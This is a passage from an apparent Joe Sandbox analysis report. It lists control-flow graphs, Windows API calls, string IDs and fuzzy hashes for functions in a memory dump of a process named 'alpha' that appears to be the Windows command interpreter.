7ff755caac5a-7ff755caac6f wcschr 367->369 371 7ff755caaf03-7ff755caaf07 368->371 372 7ff755caad97-7ff755caadac wcschr 368->372 369->305 369->368 371->305 372->371 373 7ff755caadb2-7ff755caadc7 wcschr 372->373 373->371 374 7ff755caadcd-7ff755caade2 wcschr 373->374 374->371 375 7ff755caade8-7ff755caadfd wcschr 374->375 375->371 376 7ff755caae03-7ff755caae18 wcschr 375->376 376->371 377 7ff755caae1e-7ff755caae21 376->377 378 7ff755caae24-7ff755caae27 377->378 378->371 379 7ff755caae2d-7ff755caae40 iswspace 378->379 380 7ff755caae42-7ff755caae49 379->380 381 7ff755caae4b-7ff755caae5e 379->381 380->378 382 7ff755caae66-7ff755caae6d 381->382 382->382 383 7ff755caae6f-7ff755caae77 382->383 383->259 384 7ff755caae7d-7ff755caae97 call 7ff755cb13e0 383->384 387 7ff755caae9a-7ff755caaea4 384->387 388 7ff755caaea6-7ff755caaead 387->388 389 7ff755caaebc-7ff755caaef8 call 7ff755cb0a6c call 7ff755caff70 * 2 387->389 388->389 390 7ff755caaeaf-7ff755caaeba 388->390 389->323 397 7ff755caaefe 389->397 390->387 390->389 397->281
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                      • String ID: :$:$:$:ON$OFF
                                      • API String ID: 972821348-467788257
                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                      • Instruction ID: 6d8c5db5e443c0b85de01439dc228832c7d86a3fdcf941a2386b4f2445fa7f0b
                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                      • Instruction Fuzzy Hash: 3422A1AFA0868386FB54BF219814279EA91EF45F9CFCC8535C90E47795EF7CA840C260
                                      Function 00007FF755CB51EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 398 7ff755cb51ec-7ff755cb5248 call 7ff755cb5508 GetLocaleInfoW 401 7ff755cbef32-7ff755cbef3c 398->401 402 7ff755cb524e-7ff755cb5272 GetLocaleInfoW 398->402 405 7ff755cbef3f-7ff755cbef49 401->405 403 7ff755cb5295-7ff755cb52b9 GetLocaleInfoW 402->403 404 7ff755cb5274-7ff755cb527a 402->404 408 7ff755cb52de-7ff755cb5305 GetLocaleInfoW 403->408 409 7ff755cb52bb-7ff755cb52c3 403->409 406 7ff755cb5280-7ff755cb5286 404->406 407 7ff755cb54f7-7ff755cb54f9 404->407 410 7ff755cbef61-7ff755cbef6c 405->410 411 7ff755cbef4b-7ff755cbef52 405->411 406->407 412 7ff755cb528c-7ff755cb528f 406->412 407->401 415 7ff755cb5321-7ff755cb5343 GetLocaleInfoW 408->415 416 7ff755cb5307-7ff755cb531b 408->416 413 7ff755cbef75-7ff755cbef78 409->413 414 7ff755cb52c9-7ff755cb52d7 409->414 410->413 411->410 417 7ff755cbef54-7ff755cbef5f 411->417 412->403 418 7ff755cbef7a-7ff755cbef7d 413->418 419 7ff755cbef99-7ff755cbefa3 413->419 414->408 420 7ff755cbefaf-7ff755cbefb9 415->420 421 7ff755cb5349-7ff755cb536e GetLocaleInfoW 415->421 416->415 417->405 417->410 418->408 422 7ff755cbef83-7ff755cbef8d 418->422 419->420 423 7ff755cbefbc-7ff755cbefc6 420->423 424 7ff755cbeff2-7ff755cbeffc 421->424 425 7ff755cb5374-7ff755cb5396 GetLocaleInfoW 421->425 422->419 426 7ff755cbefc8-7ff755cbefcf 423->426 427 7ff755cbefde-7ff755cbefe9 423->427 428 7ff755cbefff-7ff755cbf009 424->428 429 7ff755cbf035-7ff755cbf03f 425->429 430 7ff755cb539c-7ff755cb53be GetLocaleInfoW 425->430 426->427 434 7ff755cbefd1-7ff755cbefdc 426->434 427->424 435 7ff755cbf021-7ff755cbf02c 428->435 436 7ff755cbf00b-7ff755cbf012 428->436 433 7ff755cbf042-7ff755cbf04c 429->433 431 7ff755cb53c4-7ff755cb53e6 GetLocaleInfoW 430->431 432 7ff755cbf078-7ff755cbf082 430->432 438 7ff755cbf0bb-7ff755cbf0c5 431->438 439 7ff755cb53ec-7ff755cb540e GetLocaleInfoW 431->439 442 7ff755cbf085-7ff755cbf08f 432->442 440 7ff755cbf064-7ff755cbf06f 433->440 441 7ff755cbf04e-7ff755cbf055 433->441 434->423 434->427 435->429 436->435 437 7ff755cbf014-7ff755cbf01f 436->437 437->428 437->435 443 7ff755cbf0c8-7ff755cbf0d2 438->443 444 7ff755cb5414-7ff755cb5436 GetLocaleInfoW 439->444 445 7ff755cbf0fe-7ff755cbf108 439->445 440->432 441->440 446 7ff755cbf057-7ff755cbf062 441->446 447 7ff755cbf091-7ff755cbf098 442->447 448 7ff755cbf0a7-7ff755cbf0b2 442->448 449 7ff755cbf0d4-7ff755cbf0db 443->449 450 7ff755cbf0ea-7ff755cbf0f5 443->450 451 7ff755cbf141-7ff755cbf14b 444->451 452 7ff755cb543c-7ff755cb545e GetLocaleInfoW 444->452 453 7ff755cbf10b-7ff755cbf115 445->453 446->433 446->440 447->448 454 7ff755cbf09a-7ff755cbf0a5 447->454 448->438 449->450 455 7ff755cbf0dd-7ff755cbf0e8 449->455 450->445 460 7ff755cbf14e-7ff755cbf158 451->460 456 7ff755cbf184-7ff755cbf18b 452->456 457 7ff755cb5464-7ff755cb5486 GetLocaleInfoW 452->457 458 7ff755cbf117-7ff755cbf11e 453->458 459 7ff755cbf12d-7ff755cbf138 453->459 454->442 454->448 455->443 455->450 461 7ff755cbf18e-7ff755cbf198 456->461 462 7ff755cbf1c4-7ff755cbf1ce 457->462 463 7ff755cb548c-7ff755cb54ae GetLocaleInfoW 457->463 458->459 464 7ff755cbf120-7ff755cbf12b 458->464 459->451 465 7ff755cbf170-7ff755cbf17b 460->465 466 7ff755cbf15a-7ff755cbf161 460->466 467 7ff755cbf1b0-7ff755cbf1bb 461->467 468 7ff755cbf19a-7ff755cbf1a1 461->468 471 7ff755cbf1d1-7ff755cbf1db 462->471 469 7ff755cb54b4-7ff755cb54f5 setlocale call 7ff755cb8f80 463->469 470 7ff755cbf207-7ff755cbf20e 463->470 464->453 464->459 465->456 466->465 472 7ff755cbf163-7ff755cbf16e 466->472 467->462 468->467 473 7ff755cbf1a3-7ff755cbf1ae 468->473 477 7ff755cbf211-7ff755cbf21b 470->477 475 7ff755cbf1f3-7ff755cbf1fe 471->475 476 7ff755cbf1dd-7ff755cbf1e4 471->476 472->460 472->465 473->461 473->467 475->470 476->475 479 7ff755cbf1e6-7ff755cbf1f1 476->479 480 7ff755cbf233-7ff755cbf23e 477->480 481 7ff755cbf21d-7ff755cbf224 477->481 479->471 479->475 481->480 482 7ff755cbf226-7ff755cbf231 481->482 482->477 482->480
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: InfoLocale$DefaultUsersetlocale
                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                      • API String ID: 1351325837-2236139042
                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                      • Instruction ID: 9fac823f83673bf4297bfa265f0e0e737c13d808f698f67aa97ed36ac6030f74
                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                      • Instruction Fuzzy Hash: 3DF138BAB0868385EE51AF15E9102B9B3A4BF45F98FD84135CA0D577A4EF3CE905C320
                                      Function 00007FF755CB4224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 483 7ff755cb4224-7ff755cb42a5 InitializeProcThreadAttributeList 484 7ff755cbecd4-7ff755cbecee GetLastError call 7ff755cc9eec 483->484 485 7ff755cb42ab-7ff755cb42e5 UpdateProcThreadAttribute 483->485 492 7ff755cbed1e 484->492 487 7ff755cbecf0-7ff755cbed19 GetLastError call 7ff755cc9eec DeleteProcThreadAttributeList 485->487 488 7ff755cb42eb-7ff755cb43c6 memset * 2 GetStartupInfoW call 7ff755cb3a90 call 7ff755cab900 485->488 487->492 497 7ff755cb4638-7ff755cb4644 _local_unwind 488->497 498 7ff755cb43cc-7ff755cb43d3 488->498 499 7ff755cb4649-7ff755cb4650 497->499 498->499 500 7ff755cb43d9-7ff755cb43dc 498->500 499->500 501 7ff755cb4656-7ff755cb465d 499->501 502 7ff755cb4415-7ff755cb4424 call 7ff755cb5a68 500->502 503 7ff755cb43de-7ff755cb43f5 wcsrchr 500->503 501->502 505 7ff755cb4663 501->505 510 7ff755cb4589-7ff755cb4590 502->510 511 7ff755cb442a-7ff755cb4486 CreateProcessW 502->511 503->502 504 7ff755cb43f7-7ff755cb440f lstrcmpW 503->504 504->502 507 7ff755cb4668-7ff755cb466d call 7ff755cc9044 504->507 505->500 507->502 510->511 514 7ff755cb4596-7ff755cb45fa CreateProcessAsUserW 510->514 513 7ff755cb448b-7ff755cb448f 511->513 515 7ff755cb4672-7ff755cb4682 GetLastError 513->515 516 7ff755cb4495-7ff755cb44c7 CloseHandle call 7ff755cb498c 513->516 514->513 518 7ff755cb468d-7ff755cb4694 515->518 516->518 522 7ff755cb44cd-7ff755cb44e5 516->522 520 7ff755cb46a2-7ff755cb46ac 518->520 521 7ff755cb4696-7ff755cb46a0 518->521 523 7ff755cb46ae-7ff755cb46b5 call 7ff755cb97bc 520->523 526 7ff755cb4705-7ff755cb4707 520->526 521->520 521->523 524 7ff755cb47a3-7ff755cb47a9 522->524 525 7ff755cb44eb-7ff755cb44f2 522->525 541 7ff755cb4703 523->541 542 7ff755cb46b7-7ff755cb4701 call 7ff755cfc038 523->542 528 7ff755cb45ff-7ff755cb4607 525->528 529 7ff755cb44f8-7ff755cb4507 525->529 526->522 527 7ff755cb470d-7ff755cb472a call 7ff755cacd90 526->527 543 7ff755cb473d-7ff755cb4767 call 7ff755cb13e0 call 7ff755cc9eec call 7ff755caff70 _local_unwind 527->543 544 7ff755cb472c-7ff755cb4738 _local_unwind 527->544 528->529 532 7ff755cb460d 528->532 533 7ff755cb4612-7ff755cb4616 529->533 534 7ff755cb450d-7ff755cb4553 call 7ff755cb5cb4 call 7ff755cb33f0 call 7ff755cb498c 529->534 537 7ff755cb476c-7ff755cb4773 532->537 539 7ff755cb47d7-7ff755cb47df 533->539 540 7ff755cb461c-7ff755cb4633 533->540 564 7ff755cb4558-7ff755cb455e 534->564 537->529 548 7ff755cb4779-7ff755cb4780 537->548 545 7ff755cb47e1-7ff755cb47ed CloseHandle 539->545 546 7ff755cb47f2-7ff755cb483c call 7ff755caff70 DeleteProcThreadAttributeList call 7ff755cb8f80 539->546 540->546 541->526 542->526 543->537 544->543 545->546 548->529 550 7ff755cb4786-7ff755cb4789 548->550 550->529 556 7ff755cb478f-7ff755cb4792 550->556 556->524 560 7ff755cb4794-7ff755cb479d call 7ff755cca250 556->560 560->524 560->529 567 7ff755cb4564-7ff755cb4579 call 7ff755cb498c 564->567 568 7ff755cb47ae-7ff755cb47ca call 7ff755cb33f0 564->568 567->546 576 7ff755cb457f-7ff755cb4584 call 7ff755cca920 567->576 568->539 576->546
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                      • API String ID: 388421343-2905461000
                                      • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                      • Instruction ID: 40d428850cb47206035b04ae96e73c262031e91a8afa3d716a7acea031b48001
                                      • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                      • Instruction Fuzzy Hash: 55F14FBBA0CA8385EA60AB11E4907B9F7A5FB85F98FC84135D94D46754DF3CE844CB20
                                      Function 00007FF755CB5554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 579 7ff755cb5554-7ff755cb55b9 call 7ff755cba640 582 7ff755cb55bc-7ff755cb55e8 RegOpenKeyExW 579->582 583 7ff755cb5887-7ff755cb588e 582->583 584 7ff755cb55ee-7ff755cb5631 RegQueryValueExW 582->584 583->582 587 7ff755cb5894-7ff755cb58db time srand call 7ff755cb8f80 583->587 585 7ff755cbf248-7ff755cbf24d 584->585 586 7ff755cb5637-7ff755cb5675 RegQueryValueExW 584->586 591 7ff755cbf260-7ff755cbf265 585->591 592 7ff755cbf24f-7ff755cbf25b 585->592 588 7ff755cb5677-7ff755cb567c 586->588 589 7ff755cb568e-7ff755cb56cc RegQueryValueExW 586->589 594 7ff755cb5682-7ff755cb5687 588->594 595 7ff755cbf28b-7ff755cbf290 588->595 596 7ff755cb56d2-7ff755cb5710 RegQueryValueExW 589->596 597 7ff755cbf2b6-7ff755cbf2bb 589->597 591->586 593 7ff755cbf26b-7ff755cbf286 _wtol 591->593 592->586 593->586 594->589 595->589 599 7ff755cbf296-7ff755cbf2b1 _wtol 595->599 602 7ff755cb5712-7ff755cb5717 596->602 603 7ff755cb5729-7ff755cb5767 RegQueryValueExW 596->603 600 7ff755cbf2ce-7ff755cbf2d3 597->600 601 7ff755cbf2bd-7ff755cbf2c9 597->601 599->589 600->596 604 7ff755cbf2d9-7ff755cbf2f4 _wtol 600->604 601->596 605 7ff755cbf2f9-7ff755cbf2fe 602->605 606 7ff755cb571d-7ff755cb5722 602->606 607 7ff755cb579f-7ff755cb57dd RegQueryValueExW 603->607 608 7ff755cb5769-7ff755cb576e 603->608 604->596 605->603 611 7ff755cbf304-7ff755cbf31a wcstol 605->611 606->603 609 7ff755cb57e3-7ff755cb57e8 607->609 610 7ff755cbf3a9 607->610 612 7ff755cbf320-7ff755cbf325 608->612 613 7ff755cb5774-7ff755cb578f 608->613 614 7ff755cbf363-7ff755cbf368 609->614 615 7ff755cb57ee-7ff755cb5809 609->615 624 7ff755cbf3b5-7ff755cbf3b8 610->624 611->612 616 7ff755cbf327-7ff755cbf33f wcstol 612->616 617 7ff755cbf34b 612->617 618 7ff755cb5795-7ff755cb5799 613->618 619 7ff755cbf357-7ff755cbf35e 613->619 620 7ff755cbf36a-7ff755cbf382 wcstol 614->620 621 7ff755cbf38e 614->621 622 7ff755cb580f-7ff755cb5813 615->622 623 7ff755cbf39a-7ff755cbf39d 615->623 616->617 617->619 618->607 618->619 619->607 620->621 621->623 622->623 625 7ff755cb5819-7ff755cb5823 622->625 623->610 626 7ff755cbf3be-7ff755cbf3c5 624->626 627 7ff755cb582c 624->627 625->624 628 7ff755cb5829 625->628 629 7ff755cb5832-7ff755cb5870 RegQueryValueExW 626->629 627->629 630 7ff755cbf3ca-7ff755cbf3d1 627->630 628->627 631 7ff755cb5876-7ff755cb5882 RegCloseKey 629->631 632 7ff755cbf3dd-7ff755cbf3e2 629->632 630->632 631->583 633 7ff755cbf3e4-7ff755cbf412 ExpandEnvironmentStringsW 632->633 634 7ff755cbf433-7ff755cbf439 632->634 636 7ff755cbf414-7ff755cbf426 call 7ff755cb13e0 633->636 637 7ff755cbf428 633->637 634->631 635 7ff755cbf43f-7ff755cbf44c call 7ff755cab900 634->635 635->631 639 7ff755cbf42e 636->639 637->639 639->634
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseOpensrandtime
                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                      • API String ID: 145004033-3846321370
                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                      • Instruction ID: 96d392af58282d8b8357ef85d955c4ce233eec4dff2496abd7491d3cd07ee5d1
                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                      • Instruction Fuzzy Hash: E8E194BB92C683C6E790AB10E45017AF7A0FB89F59FC85135EA8E42A54DF7CD544CB20
                                      Function 00007FF755CB37D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 821 7ff755cb37d8-7ff755cb3887 GetCurrentThreadId OpenThread call 7ff755cb04f4 HeapSetInformation RegOpenKeyExW 824 7ff755cbe9f8-7ff755cbea3b RegQueryValueExW RegCloseKey 821->824 825 7ff755cb388d-7ff755cb38eb call 7ff755cb5920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff755cbea41-7ff755cbea59 GetThreadLocale 824->827 825->827 831 7ff755cb38f1-7ff755cb3913 memset 825->831 829 7ff755cbea74-7ff755cbea77 827->829 830 7ff755cbea5b-7ff755cbea67 827->830 834 7ff755cbea94-7ff755cbea96 829->834 835 7ff755cbea79-7ff755cbea7d 829->835 830->829 832 7ff755cbeaa5 831->832 833 7ff755cb3919-7ff755cb3935 call 7ff755cb4d5c 831->833 838 7ff755cbeaa8-7ff755cbeab4 832->838 841 7ff755cbeae2-7ff755cbeaff call 7ff755ca3240 call 7ff755cc8530 call 7ff755cb4c1c 833->841 842 7ff755cb393b-7ff755cb3942 833->842 834->832 835->834 837 7ff755cbea7f-7ff755cbea89 835->837 837->834 838->833 840 7ff755cbeaba-7ff755cbeac3 838->840 843 7ff755cbeacb-7ff755cbeace 840->843 850 7ff755cbeb00-7ff755cbeb0d 841->850 845 7ff755cbeb27-7ff755cbeb40 _setjmp 842->845 846 7ff755cb3948-7ff755cb3962 _setjmp 842->846 847 7ff755cbead0-7ff755cbeadb 843->847 848 7ff755cbeac5-7ff755cbeac9 843->848 852 7ff755cbeb46-7ff755cbeb49 845->852 853 7ff755cb39fe-7ff755cb3a05 call 7ff755cb4c1c 845->853 846->850 851 7ff755cb3968-7ff755cb396d 846->851 847->838 854 7ff755cbeadd 847->854 848->843 866 7ff755cbeb15-7ff755cbeb1f call 7ff755cb4c1c 850->866 856 7ff755cb396f 851->856 857 7ff755cb39b9-7ff755cb39bb 851->857 859 7ff755cbeb66-7ff755cbeb6f call 7ff755cb01b8 852->859 860 7ff755cbeb4b-7ff755cbeb65 call 7ff755ca3240 call 7ff755cc8530 call 7ff755cb4c1c 852->860 853->824 854->833 867 7ff755cb3972-7ff755cb397d 856->867 862 7ff755cb39c1-7ff755cb39c3 call 7ff755cb4c1c 857->862 863 7ff755cbeb20 857->863 880 7ff755cbeb71-7ff755cbeb82 _setmode 859->880 881 7ff755cbeb87-7ff755cbeb89 call 7ff755cb86f0 859->881 860->859 877 7ff755cb39c8 862->877 863->845 866->863 874 7ff755cb397f-7ff755cb3984 867->874 875 7ff755cb39c9-7ff755cb39de call 7ff755cadf60 867->875 874->867 883 7ff755cb3986-7ff755cb39ae call 7ff755cb0580 GetConsoleOutputCP GetCPInfo call 7ff755cb04f4 874->883 875->866 889 7ff755cb39e4-7ff755cb39e8 875->889 877->875 880->881 890 7ff755cbeb8e-7ff755cbebad call 7ff755cb58e4 call 7ff755cadf60 881->890 898 7ff755cb39b3 883->898 889->853 893 7ff755cb39ea-7ff755cb39ef call 7ff755cabe00 889->893 902 7ff755cbebaf-7ff755cbebb3 890->902 899 7ff755cb39f4-7ff755cb39fc 893->899 898->857 899->874 902->853 903 7ff755cbebb9-7ff755cbec24 call 7ff755cb58e4 GetConsoleOutputCP GetCPInfo call 7ff755cb04f4 call 7ff755cabe00 call 7ff755cb0580 GetConsoleOutputCP GetCPInfo call 7ff755cb04f4 902->903 903->890
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                      • API String ID: 2624720099-1920437939
                                      • Opcode ID: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                      • Instruction ID: 947aa4185e6d32f6ed324634c37020d85f0884062df1c32d718c5c27077101e6
                                      • Opcode Fuzzy Hash: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                      • Instruction Fuzzy Hash: 87C182BBE086838AF754BB6098501B8FBA1EF45F6CFCC4139D90E57691DE3CA8458660
                                      Function 00007FF755CB823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1118 7ff755cb823c-7ff755cb829b FindFirstFileExW 1119 7ff755cb82cd-7ff755cb82df 1118->1119 1120 7ff755cb829d-7ff755cb82a9 GetLastError 1118->1120 1124 7ff755cb8365-7ff755cb837b FindNextFileW 1119->1124 1125 7ff755cb82e5-7ff755cb82ee 1119->1125 1121 7ff755cb82af 1120->1121 1122 7ff755cb82b1-7ff755cb82cb 1121->1122 1126 7ff755cb83d0-7ff755cb83e5 FindClose 1124->1126 1127 7ff755cb837d-7ff755cb8380 1124->1127 1128 7ff755cb82f1-7ff755cb82f4 1125->1128 1126->1128 1127->1119 1129 7ff755cb8386 1127->1129 1130 7ff755cb82f6-7ff755cb8300 1128->1130 1131 7ff755cb8329-7ff755cb832b 1128->1131 1129->1120 1133 7ff755cb8332-7ff755cb8353 GetProcessHeap HeapAlloc 1130->1133 1134 7ff755cb8302-7ff755cb830e 1130->1134 1131->1121 1132 7ff755cb832d 1131->1132 1132->1120 1135 7ff755cb8356-7ff755cb8363 1133->1135 1136 7ff755cb8310-7ff755cb8313 1134->1136 1137 7ff755cb838b-7ff755cb83c2 GetProcessHeap HeapReAlloc 1134->1137 1135->1136 1138 7ff755cb8315-7ff755cb8323 1136->1138 1139 7ff755cb8327 1136->1139 1140 7ff755cc50f8-7ff755cc511e GetLastError FindClose 1137->1140 1141 7ff755cb83c8-7ff755cb83ce 1137->1141 1138->1139 1139->1131 1140->1122 1141->1135
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorFileFindFirstLast
                                      • String ID:
                                      • API String ID: 873889042-0
                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                      • Instruction ID: 898cbbf6f98cefebe8f76a33f97193f8dc682c7c4905a5e9254f387ea2a84903
                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                      • Instruction Fuzzy Hash: D75129BBA09B8386EB40AB11E544179BBA0FB4AF99FCD9135CA1D43390DF3CE4548760
                                      Function 00007FF755CB2978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
